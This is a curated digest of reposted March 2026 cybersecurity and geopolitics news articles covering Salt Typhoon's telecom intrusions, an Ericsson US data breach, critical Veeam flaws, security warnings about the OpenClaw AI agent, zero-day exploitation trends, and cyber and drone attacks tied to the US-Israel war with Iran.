Cyberveille, curated by Decio
Salt Typhoon is hacking the world's phone and internet giants — here's everywhere that's been hit https://techcrunch.com/2026/03/09/salt-typhoon-china-who-has-been-hacked-global-telecom-giants/
15/03/2026 13:06:28

techcrunch.com
Zack Whittaker
8:50 AM PDT · March 9, 2026

Salt Typhoon is by far one of the most prolific hacking groups in recent years, breaching some of the top American phone companies. Here are all the countries that have been targeted.

Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials.

The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China prepare for an eventual war with Taiwan, according to researchers. U.S. officials have called China’s potential invasion of Taiwan an “epoch-defining threat.” Much of the group’s efforts have focused on hacking Cisco routers at the edge of a company’s network to break in, and on taking control of the surveillance devices that U.S. telecom companies are legally required to install so that law enforcement can monitor calls and messages.

While Salt Typhoon is focused on hacking telecom infrastructure, other China-backed groups like Volt Typhoon are prepositioning for destructive cyberattacks capable of causing widespread disruption, and Flax Typhoon runs a botnet of hijacked internet-connected devices to hide the hackers’ malicious internet traffic.

But Salt Typhoon is by far one of the most prolific hacking groups in recent years, including targeting some of the top American phone companies.

The hacks allowed China to obtain call records, text messages, and captured phone audio from senior U.S. officials, many of whom were considered government targets of interest. This prompted the FBI to urge Americans to switch to end-to-end encrypted messaging apps, fearing that a foreign adversary could eavesdrop on their communications.

Salt Typhoon went even further, hacking at least 200 companies around the world, according to FBI officials. The list of affected countries keeps growing.

Here are the countries that have attributed hacks to Salt Typhoon.

United States
Some of the top U.S. phone companies, including AT&T and Verizon, were confirmed hacked by Salt Typhoon, as was internet provider CenturyLink (now Lumen). T-Mobile said it was targeted but that the hackers had no access to its customers’ calls, text messages, or voicemails.

Satellite communications giant Viasat was also compromised, allowing hackers to gain access to tools used by law enforcement to access the communications of others.

Internet and data providers Charter Communications (Spectrum) and Windstream were also named as Salt Typhoon victims. Fiber network giant Consolidated Communications was reportedly hacked as part of the campaign.

The hackers didn’t just target phone and internet providers. Per several reports, Salt Typhoon compromised the networks of a U.S. state’s National Guard, allowing them to steal data and gain access to networks in every other U.S. state and several territories.

North and South America
According to security firm Recorded Future, its researchers have seen Salt Typhoon target Cisco devices associated with universities in Argentina and Mexico and elsewhere.

Meanwhile, the Canadian government confirmed that its top telecommunications firms were hacked by China as part of Salt Typhoon’s extended espionage campaign. Canada also confirmed several Cisco routers at one telecom giant were hacked to steal data from the company.

The government in Ottawa warned it saw targeting of companies that were “broader than just the telecommunications sector.”

Trend Micro said it saw Salt Typhoon activity in Brazil, the most populous country in South America.

Asia, Africa, and Oceania
Recorded Future said it’s seen Salt Typhoon targeting at least one Myanmar-based telecoms provider, Mytel, by way of hacked Cisco routers, as well as a South African telecommunications provider. It’s also seen attacks targeting routers of universities across Bangladesh, Indonesia, Malaysia, and Thailand.

Japan has also warned of the threat of Salt Typhoon to its networks.

Both the governments of Australia and New Zealand say they’ve seen Salt Typhoon activity in their telecom and critical infrastructure sectors. New Zealand said it also saw Salt Typhoon hackers across the government sector, as well as transportation, lodging, and military infrastructure networks.

Trend Micro also said it found at least 20 compromised organizations across the telecoms, consulting, chemical, and transportation industries, as well as government agencies and nonprofits in various countries, including Afghanistan, Eswatini, India, Taiwan, and the Philippines.

Europe
The British government has confirmed that a “cluster of activity” from Salt Typhoon was seen across the United Kingdom. While the activity wasn’t specified, news reporting suggests that senior U.K. government staff may have had their phone records tapped and text messages read.

Norway has also confirmed Salt Typhoon hacked several organizations in the country.

Dutch authorities say that several smaller internet providers and web hosts in the Netherlands were targeted and that the hackers gained access to routers, but the companies’ internal networks were not compromised.

An Italian internet provider was hacked, per Recorded Future.

And, according to Czech cybersecurity officials, incidents related to Salt Typhoon hacks have been witnessed in Finland and Poland.

techcrunch.com EN 2026 Salt-Typhoon telecoms
Ericsson US discloses data breach after service provider hack https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
15/03/2026 13:03:35

bleepingcomputer.com
By Sergiu Gatlan
March 9, 2026

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide.

In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider that was storing personal data for employees and customers discovered a breach on April 28, 2025.

After detecting the incident, the third-party vendor notified the FBI and hired external cybersecurity experts to assess the extent of the breach and its impact.

The investigation, which was completed last month, found that a total of 15,661 individuals had their data exposed in the incident. However, Ericsson noted that the compromised provider has yet to find evidence that the data has been misused since the breach.

"Based on the investigation, our service provider determined that a limited subset of files may have been accessed or acquired without authorization between April 17, 2025 and April 22, 2025," Ericsson said.

"As part of its investigation, it retained external data specialists to conduct a comprehensive review of the potential affected files to identify any personal information. That review was completed on February 23, 2026 at which time we determined that some of your personal information was contained within the affected files."

According to a separate filing with the Texas Attorney General, the exposed information includes affected individuals' names, addresses, Social Security numbers, driver’s license numbers, government-issued ID numbers (e.g., passport, state ID cards), financial information (e.g., account numbers, credit or debit card numbers), medical information, and dates of birth.

Ericsson is now providing free IDX identity protection services, including credit monitoring, dark web monitoring, identity theft recovery, and a $1 million identity fraud loss reimbursement policy to affected people who enroll by June 9, 2026.

Although the company flagged this incident as a data theft attack, no cybercrime group has taken responsibility for the breach. This raises the possibility that either the third-party vendor paid the ransom demanded by the attackers or that the threat actors were unable to connect the breach to Ericsson.

When BleepingComputer reached out for more details on the breach, including the total number of affected individuals, an Ericsson spokesperson said they didn't have "anything to share beyond the letter."

Update March 10, 06:39 EDT: In a filing with Maine's Attorney General, Ericsson says the breach affects a total of 15,661 individuals.

bleepingcomputer.com EN 2026 Data-Breach Data-Theft Ericsson Telecommunications USA
Tel Aviv train station hit by cyberattack with fake missile alerts | Ctech https://www.calcalistech.com/ctechnews/article/rkuy5flcbx
15/03/2026 12:57:40

calcalistech.com
Hofit Cohen Azulay
12:55, 12.03.26

Cyberattack affects platform advertising screens; national cybersecurity authorities investigate.

A cyberattack targeted advertising signs in the passenger halls at Herzliya Station and Shalom Train Station in Tel Aviv on Wednesday. It is estimated that Iranian hackers took control of the signs and posted messages claiming that the stations were expected to be attacked by Iranian missiles and instructing the public to evacuate immediately.

Israel Railways clarified that these signs are not connected to the railway infrastructure and are located on platforms as part of a private provider’s advertising and information system. Shortly after the incident, the screens were taken offline. The National Cyber Directorate, in cooperation with Israel Railways, began investigating the source of the malfunction. Railways officials emphasized that the affected screens are part of an external network unrelated to essential railway infrastructure. Therefore, there was no risk to critical systems or the railway's passenger information system (PIS).

Earlier, Iran’s Fars News Agency falsely claimed that Israel’s entire railway system had been hacked and disabled. The agency stated:
"Israel’s railways have been hacked. As a result of a cyberattack, the enemy’s railway system has been disabled. All [Israeli railway] stations are not safe until further notice."

Following the incident, Israel Railways announced on Thursday that, in accordance with Home Front Command guidelines, it is continuing efforts to resume service on travel routes, increase train frequency, and reopen additional stations.

calcalistech.com EN 2026 Israel Tel-Aviv cyberattack targeted advertising-signs
China issues second warning on OpenClaw risks amid adoption frenzy https://www.scmp.com/tech/tech-trends/article/3346138/china-issues-second-warning-openclaw-risks-amid-adoption-frenzy
15/03/2026 12:49:46

scmp.com
Ben Jiang in Beijing
Published: 10:14pm, 10 Mar 2026

Cybersecurity agency cautions that improper installation and use of the AI agent carry severe security and data risks.

China’s cybersecurity agency on Tuesday issued a second warning about security and data risks tied to OpenClaw, despite a rush among local governments and tech companies to adopt the artificial intelligence agent amid a nationwide frenzy.

At a time when major Chinese cloud service providers were touting easy deployment of OpenClaw to capitalise on its popularity, improper installation and use of the agent had also led to severe security risks, said the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT), a non-governmental and non-profit cybersecurity technical platform, in a notice published on its WeChat account.

Released by Austrian developer Peter Steinberger late last year, OpenClaw is software that is taking the world by storm for its ability to perform tasks on a user’s behalf, organising and responding to emails, drafting work reports and preparing slide decks.

CNCERT partly blamed OpenClaw’s security challenges on its ability to perform tasks autonomously, which required high-level permissions that heightened exposure to breaches.

The agency said OpenClaw was vulnerable to threats including “prompt injection”, in which attackers embed hidden malicious instructions in webpages which, when read by the software, could trick it into leaking a user’s system keys.

It was also prone to “operational errors”, in which the agent may misinterpret user commands and unintentionally delete critical information, including emails and important files, potentially causing significant data loss.

scmp.com EN 2026 Changshu National-Vulnerability-DataBase OpenClaw China AI Ministry-of-Industry-and-Information-Technology CNCERT
Veeam warns of critical flaws exposing backup servers to RCE attacks https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/
13/03/2026 11:19:47

bleepingcomputer.com
By Sergiu Gatlan
March 12, 2026

Data protection company Veeam Software has patched multiple flaws in its Backup & Replication solution, including four critical remote code execution (RCE) vulnerabilities.

Veeam Backup & Replication (VBR) is enterprise data backup and recovery software that helps IT administrators create copies of critical data for quick restoration after cyberattacks and hardware failures.

Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks.

The fourth one (tracked as CVE-2026-21708) allows a Backup Viewer to gain remote code execution as the postgres user.

Veeam also addressed several high-severity security bugs that can be exploited to escalate privileges on Windows-based Veeam Backup & Replication servers, extract saved SSH credentials, and bypass restrictions to manipulate arbitrary files on a Backup Repository.

These vulnerabilities were discovered during internal testing or reported through HackerOne and are resolved in Veeam Backup & Replication versions 12.3.2.4465 and 13.0.1.2067.

Veeam also warned admins to upgrade the software to the latest release as soon as possible, since threat actors often begin developing exploits shortly after patches are released.

"It's important to note that once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments of Veeam software," the company warned. "This reality underscores the critical importance of ensuring that all customers use the latest versions of our software and install all updates and patches without delay."

VBR servers targeted in ransomware attacks
VBR is popular among managed service providers and mid-sized to large enterprises, and ransomware gangs commonly target VBR servers because they can serve as a quick jumping-off point for lateral movement within breached networks, simplify data theft, and make it easy to block restoration efforts by deleting victims' backups.

The financially motivated FIN7 threat group (which previously collaborated with the Conti, REvil, Maze, Egregor, and BlackBasta ransomware groups) and the Cuba ransomware gang have both been linked to past attacks targeting VBR vulnerabilities.

Sophos X-Ops incident responders also revealed in November 2024 that Frag ransomware exploited another VBR RCE bug disclosed two months earlier and also used in Akira and Fog ransomware attacks starting in October 2024.

Veeam says its products are used by more than 550,000 customers worldwide, including 74% of Global 2,000 firms and 82% of Fortune 500 companies.

bleepingcomputer.com EN 2025 Backup RCE Remote-Code-Execution Veeam Veeam-Backup-&-Replication Vulnerability
Iran Includes American Tech Giants on List of New Targets https://gizmodo.com/iran-includes-american-tech-giants-on-list-of-new-targets-2000732530
13/03/2026 08:46:24

Gizmodo
By Ece Yildirim
Published March 11, 2026

State-aligned media released a list naming the offices of Microsoft, Palantir, and more as potential targets of military action.

A news agency affiliated with the Iranian regime released a list of American tech companies with links to American and Israeli military operations as new targets for Iran on Wednesday.

According to Al Jazeera, the Tasnim News Agency’s report lists Microsoft, Google, Palantir, IBM, Nvidia, and Oracle’s offices and cloud infrastructure in Israel and some Gulf countries as the new targets.

On top of targeting the tech giants, a spokesperson for a group owned by Iran’s Islamic Revolutionary Guard Corps told Al Jazeera that American and Israeli economic centers and banks in the region are also legitimate targets now, and warned people to “not be within a one-kilometre radius of banks.”

The list comes on the heels of an Israeli attack on a bank in Iran’s capital city of Tehran, according to Tasnim News Agency, which expanded “the scope of the regional war” to an “infrastructure war.”

The United States and Israel began their military campaign against Iran at the end of last month, with Iran responding with retaliatory strikes on Israeli soil and on American military bases in the region from Cyprus and Turkey to the Gulf countries.

As the war entered its 12th day, more than 1,300 civilians in Iran have been killed, including 175 people (most of them children) at an elementary school in southern Iran, reportedly struck by American missiles.

All six of the tech giants named by Iranian media have lucrative partnerships with the Pentagon and/or Israel. Nvidia is building data centers and a research and development campus in Israel, a country that CEO Jensen Huang has recently called “Nvidia’s second home.” Microsoft, Google, Palantir, IBM, and Oracle all have a close history with the Israeli government and military, with some reports claiming that the AI technology provided by these American tech giants is aiding the army in the mass surveillance of Palestinians. Meanwhile, Google, Oracle, IBM, Microsoft, and Palantir also have military AI agreements with the Pentagon.

Though not named by Tasnim, another American tech giant with ties to both American and Israeli military operations is Amazon. One of the company’s operating facilities in Bahrain and two of its data centers in the United Arab Emirates were heavily damaged earlier this month following Iranian drone strikes. The strikes, which Iranian state media later described as targeted, led to power disruptions and degraded AWS applications in the region.

So far, Iran’s military actions have been limited to the region. That could change, according to an ABC News report also from Wednesday, as the FBI has claimed Iran could launch drone strikes on the West Coast of the United States, where the headquarters of tech giants like Google, Nvidia, and Microsoft are located. But the chances of that happening are very slim, as even President Trump himself has said he is not worried, and the Iranian report explicitly threatens damage to the offices and infrastructure that these tech companies have in the Middle East.

gizmodo.com EN 2026 US-Israel-Iran-War Tech-Giants targets
How AI Is Turbocharging the War in Iran https://www.wsj.com/tech/ai/how-ai-is-turbocharging-the-war-in-iran-aca59002?st=tkAocR&reflink=desktopwebshare_permalink
09/03/2026 06:45:26

wsj.com
By Daniel Michaels and Dov Lieber
March 7, 2026 12:00 pm ET

The U.S. and Israeli attacks on Iran have unfolded at unprecedented speed and precision thanks to months of planning, a massive assemblage of military force and a cutting-edge weapon never before deployed on this scale: artificial intelligence.

AI tools are helping gather intelligence, pick targets, plan bombing missions and assess battle damage at speeds not previously possible. AI helps commanders manage supplies of everything from ammunition to spare parts and lets them choose the best weapon for each objective.

Before Israeli jet fighters launched ballistic missiles that killed Iran’s Supreme Leader Ali Khamenei at his residence a week ago, launching the current regional war, Israeli intelligence services had for years been monitoring hacked Tehran traffic cameras and eavesdropping on senior officials’ communications—increasingly relying on AI to sift through a flood of intercepts.

The use of AI in the campaign against Iran follows years of work by the Pentagon and lessons learned from other militaries. Ukraine—with U.S. help—increasingly relies on AI in its war against Russia. Israel has tapped AI in conflicts at least since the October 2023 Hamas attacks.

Defense Secretary Pete Hegseth has urged accelerated adoption of AI to create “an ‘AI-first’ warfighting force.” At the same time, he is engaging in a public battle with Anthropic, a critical AI supplier, and the Pentagon has contracted with rival OpenAI to use its models in classified settings. President Trump has ordered the government to stop using Anthropic’s products. But U.S. officials say the fight unfolding in Iran is showing the usefulness of Anthropic’s AI agent, Claude.

The U.S. and Israel have declined to discuss exactly how they are employing AI in the widening conflict, but recent comments from military leaders and technical experts provide a window.

Most military AI applications aim to give commanders and planners more complete information, faster than is now possible. That, in turn, should let them make better and quicker decisions than the enemy can, gaining a battlefield advantage.

The U.S. says it has struck more than 3,000 targets in Iran since the attacks began Saturday, using an array of weapons including attack drones launched from ships, F-22 jet fighters taking off from Israel and B-2 stealth bombers flying from the U.S.

While the complexity of managing so many aircraft and weapons is getting a boost from AI, its use remains limited and the cost of badly informed decisions remains high. U.S. military investigators believe American forces likely were responsible for a strike on the war’s first day that killed dozens of children at a girls elementary school in Iran, The Wall Street Journal reported.

Talk of military AI can conjure images of killer robots, but the reality is that its biggest uses now are often off the battlefield, in time-consuming and labor-intensive fields like intelligence, mission planning and logistics.

These noncombat areas are ripe for AI-inspired efficiency because out of every 10 people in the military, at most two face combat. Up to 90% of personnel are in support roles.

The Pentagon’s AI tools are similar to ChatGPT and other mass-market large language models, but limited to warfare and trained to tackle specific tasks using relevant information, seeking to avoid glitches and inaccuracies often besetting AI.

Still, war is among the most chaotic and complex human endeavors—posing unique problems for even the cutting edge of robotic thinking. The Pentagon’s first AI chief, retired Air Force Lt. Gen. Jack Shanahan, said building military AI is tough in part because much of the available data for training is out of date or unclear.

“The Department of Defense was built as a hardware company in the industrial age, and it has struggled to become a digital company in a software-centric era,” said Shanahan, who oversaw an AI-powered project in Iraq, dubbed Maven, almost a decade ago.

Military strikes start with intelligence. Gathering and parsing it can require thousands of analysts grinding for hours over communications intercepts, photographs and radar images as they try to divine the locations of missile launchers, tunnels and other targets.

Human analysts can examine at most 4% of the intelligence material that is typically collected, say U.S. officers who have worked in the field.

“The biggest immediate impact of AI is in intelligence,” said Israeli Col. Yishai Kohn, the defense ministry’s head of planning, economics and IT. “Many potential missions simply never happened because the manpower didn’t exist” to assess vital intelligence, said Kohn.

AI-powered machine vision can now quickly find vast numbers of targets—with the ability to single out specific models of aircraft or vehicles. It can listen for and summarize relevant conversations from intercepts.

“Intelligence agencies already have access to tons of video data, and current AI enables them to detect exactly what they need within an ocean of data,” said Matan Goldner, chief executive of Conntour, an Israeli company selling software to its and other countries’ security agencies that allows them to query video databases the same way LLMs are used to find patterns in texts.

Just as with mass-market AI, users can bore into results with queries, such as to identify every missile launcher located near a hospital. They can also set the system to alert when an event happens, such as “Tell me every time someone takes a photo near this military base.”

The U.S. Army’s 18th Airborne Corps, using software from data company Palantir Technologies in a continuing string of exercises dubbed Scarlet Dragon, matched its own record from Iraq as the military’s most efficient targeting operation ever, according to Emelia Probasco, a senior fellow at Georgetown University’s Center for Security and Emerging Technology. Thanks to AI, the corps achieved that with only 20 people, compared with more than 2,000 staffers employed in Iraq, she said.

Militaries in the North Atlantic Treaty Organization are using AI to track Russia’s shadow fleet of tankers, scanning millions of square miles several times a day for vessels that are illegally transferring fuel at sea, said French Adm. Pierre Vandier, NATO’s top officer for digital transformation. Imagery is then linked to ship identities for closer tracking and potential action, he said.

Vandier said AI is turning military intelligence analysis from a task of groping in darkness for targets to one of sifting through piles of them. “The number of targets you can nominate through AI is just skyrocketing,” Vandier said.

To prioritize targets and develop a course of action, the Pentagon is increasingly using AI to run models and digital wargames. In one of many efforts, last year it contracted with Pittsburgh-based Strategy Robot to develop advanced systems that can churn through vast numbers of scenarios despite imperfect information. From potentially millions of iterations, planners can zoom in on actions that are more likely to achieve their objectives.

In the pre-AI world, after rough outlines were agreed on for an operation, commanders and specialists would develop mission plans, compiling paper-stuffed binders in a weekslong exercise. AI can potentially do the same work in days, military leaders say.

Planning any military assault—from the fast, targeted mission in January to seize Venezuelan strongman Nicolás Maduro to the war with Iran—brings together subject-matter specialists including intelligence officers, combat commanders, weapons experts and logistics managers. Sessions can include around 40 people.

“The more people you add into planning, the longer it takes,” said a U.S. Army officer in Europe with experience in the process.

As preparations advance and plans evolve, each specialist revises their own plans, with knock-on effects for the others. If intelligence reports, for example, shift a bombing target to a more-distant objective, commanders may opt to use different aircraft or weapons, which in turn can affect crew rostering, flight planning and fuel consumption.

Until now, updating all those factors was slow and often subjective. Now AI can process complex interactions instantaneously, accounting for how each change ripples through military choreography.

Once a strike occurs, AI can speed assessments of battle damage, via image-processing software like tools helping with initial intelligence. While analysis is limited by the quality of imagery—which can depend on factors as basic as weather and whether a target is above ground—AI’s ability to merge varied inputs is changing the discipline. In a process known as sensor fusion, AI can digest visuals, radar, heat signatures and mass-spectroscopy to synthesize a list of possible conclusions. Fast analysis of where attacks succeeded or failed in turn helps refine lists of subsequent targets.

One thing AI can’t replace is human judgment. Many military officials involved in AI projects warn that the technology’s capabilities risk prompting an overreliance on information it provides—a trend linked with the phrase “The computer said to do this.”

Offloading decisions to AI “is a serious concern,” said Probasco at Georgetown, who held various posts in the Navy. She said that, as with other weapons systems, safeguards must be implemented to limit risks. “That infrastructure is underinvested in now,” she said.

wsj.com EN 2026 AI warfare Cyber-warfare US-Israel-Iran-War
‘It means missile defence on datacentres’: drone strikes raise doubts over Gulf as AI superpower | US-Israel war on Iran | The Guardian https://www.theguardian.com/world/2026/mar/07/it-means-missile-defence-on-data-centres-drone-strikes-raises-doubts-over-gulf-as-ai-superpower
09/03/2026 06:44:38

theguardian.com
Daniel Boffey Chief reporter
Sat 7 Mar 2026 12.00 CET

Iran’s targeting of commercial datacentres in the UAE and Bahrain signals a new frontier in asymmetric warfare

It is believed to be a first: the deliberate targeting of a commercial datacentre by the armed forces of a country at war.

At 4.30am on Sunday morning, what is thought to have been an Iranian Shahed 136 drone struck an Amazon Web Services datacentre in the United Arab Emirates, setting off a devastating fire and forcing a shutdown of the power supply. Further damage was inflicted as attempts were made to suppress the flames with water.

Soon after, a second datacentre owned by the US tech company was hit. Then a third was said to be in trouble, this time in Bahrain, after an Iranian drone turned to fireball on striking land nearby.

Iranian state TV has claimed that Iran’s Islamic Revolutionary Guard Corps launched the attack “to identify the role of these centres in supporting the enemy’s military and intelligence activities”.

The network built by Jeff Bezos’s company could withstand one of its regional centres being taken out of action but not a second.

The coordinated strike had an immediate impact.

Millions of people in Dubai and Abu Dhabi woke up on Monday unable to pay for a taxi, order a food delivery, or check their bank balance on their mobile apps.

Whether there was a military impact is unclear – but the strikes swiftly brought the war directly into the lives of 11 million people in the UAE, nine out of 10 of whom are foreign nationals. Amazon has advised its clients to secure their data away from the region.

Perhaps more significantly, the strikes on this ‘next generation’ war target are now raising questions about the prospects of the UAE building on its plans, and on many billions of pounds’ worth of US and other foreign investment, to exploit what they hope will be the ‘new oil’: artificial intelligence (AI).

“The UAE really wants to be a major AI player,” said Chris McGuire, an AI and technology competition expert who served as a White House national security council official in Joe Biden’s administration. “Their government has very strong conviction about this technology, probably stronger than any other government in the world, and if there’s going to start to be security questions around that, then they’re going to have to resolve those very quickly, somehow.”

A datacentre is a facility designed to store, manage, and operate digital data.

The growing demand by businesses for artificial intelligence (AI) and cloud computing – where firms have a pay-as-you-go relationship with the providers of servers, storage and software – is driving the need for centres that have significantly more computational power.

It requires a ready and consistent supply of very cheap electricity.

The UAE, as it seeks to diversify away from fossil fuels, has been able to point out that it has this in spades, along with a huge sovereign wealth fund ready to invest and subsidise projects.

According to Turner & Townsend’s Global Data Centre Index, the global cost of datacentre construction increased by 5.5% in 2025 – but the UAE ranks 44th out of 52 in the league table of most expensive unit cost per watt.

The UAE’s geography also makes it a critical subsea cable landing point, providing access between Europe and Asia.

Then there are the geopolitics, with the US keen to keep the Gulf states away from Chinese technology.

A four-day tour by Donald Trump of Saudi Arabia, Qatar, and the UAE last May coincided with the announcement of the construction of a vast new AI campus – a partnership between the UAE and the US – for the purpose of training powerful AI models.

As part of the deal, the Trump administration eased restrictions on advanced chips sales to the Gulf. OpenAI has said the planned UAE campus could eventually serve half the world’s population.

McGuire said that this week’s events could be pivotal. “If we’re going to have large scale datacentres built out in the Middle East, we’re going to have to get pretty serious about how we protect them,” he said. “We think about how to protect it right now, and we’re saying, ‘Oh, it means you have guards and good cybersecurity’.

“If you’re actually going to double down the Middle East, maybe it means missile defence on datacentres.”

Sean Gorman, the chief executive of Zephr.xyz, a technology firm that is a contractor to the US air force, said that the Gulf states’ ambitions would have likely been in the thoughts of military planners in Tehran.

He said: “I believe the Iranians are building on tactics they’ve seen be effective in the Ukraine conflict. Asymmetric warfare that can target critical infrastructure creates pressure on adversaries by disrupting public safety and economic activity.

“UAE and Bahrain have both been positioning themselves as global AI hubs by investing heavily in datacentres and fibre infrastructure to connect them to the rest of the world.

“If they can disrupt that infrastructure, it puts their strategic position under risk while also disrupting operations that are important to the economy. In addition, there could be an adjacent impact of defence operations, but that would likely be more luck than the primary objective.”

Gorman said the UAE had a “long track record of managing regional instability without becoming party to it” but that there were a range of risks apart from that from the air.

He said: “The UAE also has one of the most diversified submarine-cable landing environments in the Middle East, but the diversity is geographically uneven.

“There are multiple landing stations and cable systems, but many of them concentrate on the east coast at Fujairah, which creates a partial geographic chokepoint.

“In addition, there is a specific risk from Iranian cyber operations targeting US-aligned digital infrastructure in the Gulf, which presents a more concrete near-term threat to datacentre and cloud operations than geography in the traditional sense.”

Gorman said the concern would be if Iran demonstrated any further capability to target Gulf digital infrastructure as part of its retaliation.

He said: “The UAE will need to show partners that its infrastructure is defensible. This is the question investors should be asking, not whether the broader AI ambition survives.”

Vili Lehdonvirta, professor of technology policy at Aalto University and senior fellow at the Oxford Internet Institute, University of Oxford, said there were significant costs to such defences but that the danger was real.

The former chair of the US National Security Commission on AI, Eric Schmidt, suggested last year that a country falling behind in an AI arms race could bomb their adversary’s datacentres.

Lehdonvirta said he suspected that no one actually believed that datacentres “would get bombed despite such scenarios being openly floated for some time”.

“If that’s the case then from now on we might perhaps see operators of prominent datacentres like AWS [Amazon Web Services] investing in air defence, similar to how shipping operators armed up against pirates,” he said.

Where might Iran fruitfully strike next?

“The Iranians will be well aware that the fibreoptic cables that connect these datacentres to the United States and to the rest of the world run through the strait of Hormuz,” Lehdonvirta said, “although they’ll be closely watched by the US and allied forces.”


theguardian.com EN 2026 Cyber-warfare US-Israel-Iran-War Amazon datacenters
Spyware suppliers exploit more zero-days than nation states https://www.computerweekly.com/news/366639774/Spyware-suppliers-exploit-more-zero-days-than-nation-states
08/03/2026 12:13:58

Computer Weekly
computerweekly.com
By Alex Scroxton, Security Editor
Published: 05 Mar 2026 15:00

Exploitation of zero-days by commercial surveillance and spyware developers outpaced exploitation by nation-state actors last year, according to a report.

Suppliers of commercial spyware have edged ahead of nation-state threat actors when it comes to the exploitation of zero-day vulnerabilities at scale, according to data released by the Google Threat Intelligence Group (GTIG).

In a report titled Look what you made us patch: 2025 zero-days in review, the GTIG team said that of 42 unique zero-days it tracked in 2025, it was able to firmly attribute first exploitation of 15 to commercial surveillance vendors (CSVs), compared with 12 that were first exploited by nation-states (seven of them by China), and nine by financially motivated cyber criminals.

The data additionally highlight three zero-days that were “likely” exploited by China, and one possibly at the intersection of cyber crime and nation-state activity.

The GTIG team, comprising researchers Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Stevens and Fred Plan, wrote that despite CSVs increasingly focusing on operational security to obscure their unethical activity, the growth in their activity reflected a trend dating back several years.

“Historically, traditional state-sponsored cyber espionage groups have been the most prolific attributed users of zero-day vulnerabilities,” they said. “[But] over the last few years, the increase of zero-day exploitation attributed to CSVs and their customers has demonstrated the growing ability of these vendors to provide zero-day access to a wider range of threat actors than ever before.

“GTIG has reported extensively on the capabilities CSVs provide their clients, as well as how many CSV customers use zero-day exploits in attacks which erode civil liberties and human rights,” they added.

“In late 2025, we reported on how Intellexa, a prolific procurer and user of zero-days, adapted its operations and tool suite and continues to deliver extremely capable spyware to high paying customers.”

China-nexus threat actors
Beyond CSVs, China-nexus threat actors were the most prolific exploiters of new zero-days, predominantly focusing on edge and networking devices that are hard to monitor, as they seek to gain long-term footholds in their targets’ operations.

GTIG said it was clear that China-nexus espionage actors have become increasingly adept at developing and sharing exploits among themselves, demonstrating their government is prepared to shower them with plentiful technical, and presumably financial, resources – compared with the other “Big Four” states of Iran, North Korea and Russia.

Russian cyber criminals, on the other hand, continue to make a killing and remain able to similarly invest in technical expertise, as evidenced last year by Cl0p’s extortion campaign targeting flaws in Oracle E-Business Suite, and the exploitation of a flaw in the WinRAR file archiver by a group with possible links to the long-standing and ever-present Evil Corp crew.

Overall zero-day volumes remain on par
All this said, more widely, GTIG observed a total of 90 zero-days under active exploitation during 2025, lower than 2023’s record high of 100, but generally in the 60 to 100 range that has become established since the Covid-19 pandemic.

Of these 90 flaws, 43 (48%) targeted enterprise technology, with zero-days increasingly affecting security and network edge devices, which are favoured by cyber criminals and nation-states alike.

CSVs, on the other hand, tended to prefer mobile and browser exploits, the overall volume of which is ebbing and flowing – well up on 2024, but about on par with 2023 – likely thanks to more focused actions from the likes of Google on Android and Apple on iOS, which have forced such threat actors to expand or adjust their techniques, leading to the peaks and troughs.

Broken out by supplier, GTIG found that the clear majority of zero-days understandably target Microsoft, which accounted for 25 in total. This was followed by Google, with 11; Apple, with eight; Cisco and Fortinet, tied on four; and Ivanti and VMware, with three. Six more suppliers had two zero-days each, and the remaining 20 were split across 20 suppliers.

Looking ahead into 2026, GTIG said that as supply-side actors continue their work to make zero-day exploitation tougher for the bad guys – particularly in the mobile space – adversaries will unfortunately continue to hone their skills as well, foreshadowing more expansive techniques and a growing diversity of targets.

The team said that enterprise exploitation in particular will widen thanks to the sheer breadth of applications and devices now in use, with only a single point of failure needed for threat actors to engineer a breach.

The AI factor
The team also expects artificial intelligence (AI) to accelerate the race between attackers and defenders, with AI increasingly used to automate and scale attacks by accelerating recon activity and, critically, exploit discovery and development.

This will put more pressure on defenders to detect and respond to zero-days, but at the same time, they will of course be able to take advantage of AI tools – like agents – in their own work.

GTIG also indicated an emerging paradigm for zero-day exploitation in 2026, heralded by the Brickstorm malware campaign, in which data theft “has the potential to enable long-term zero-day development”.

Rather than merely stealing sensitive client data, Brickstorm’s actors – known as Warp Panda – used it to target their intellectual property, such as source code and development documents, something they could use to work angles on new zero-days in their victims’ software.

computerweekly.com EN 2026 Spyware zero-days
Israel says it knocked out Iran’s cyber warfare headquarters https://www.politico.com/news/2026/03/04/israel-iran-cyber-headquarters-00813364
08/03/2026 12:05:26

politico.com
By Maggie Miller
03/04/2026 07:00 PM EST

But it’s unclear if the strike has fully taken out Iran’s ability to launch cyberattacks as the Middle East war expands.
The Israel Defense Forces on Wednesday said it bombed a compound in Tehran housing Iran’s cyber warfare headquarters — but it’s unclear whether the strike will significantly kneecap Iran’s cyberattack capabilities.

According to a statement from the IDF, its forces on Wednesday carried out a “wide-scale strike” targeting a collection of military sites on the eastern edge of Tehran that allegedly housed the headquarters of the Iranian Islamic Revolutionary Guards Corps. The IDF claims that the IRGC’s “cyber and electronic headquarters” and its “Intelligence Directorate” were among the military outposts hit in the strike.

It’s unclear to what extent these military sites were damaged or whether there were any casualties. Iran remains under an almost total internet blackout, which began on Feb. 28 when the first U.S. and Israeli strikes began, limiting the flow of information coming out of Iran.

Spokespeople for the IDF and for the Israeli Embassy in Washington did not respond to requests for comment. A spokesperson for the White House declined to comment on whether the U.S. was involved in the strikes and instead deferred to U.S. Central Command, which did not respond to a request for comment.

The IRGC has been linked to major cyber operations against the U.S. in recent years, including a hack and leak attack against the presidential campaign of Donald Trump in 2024.

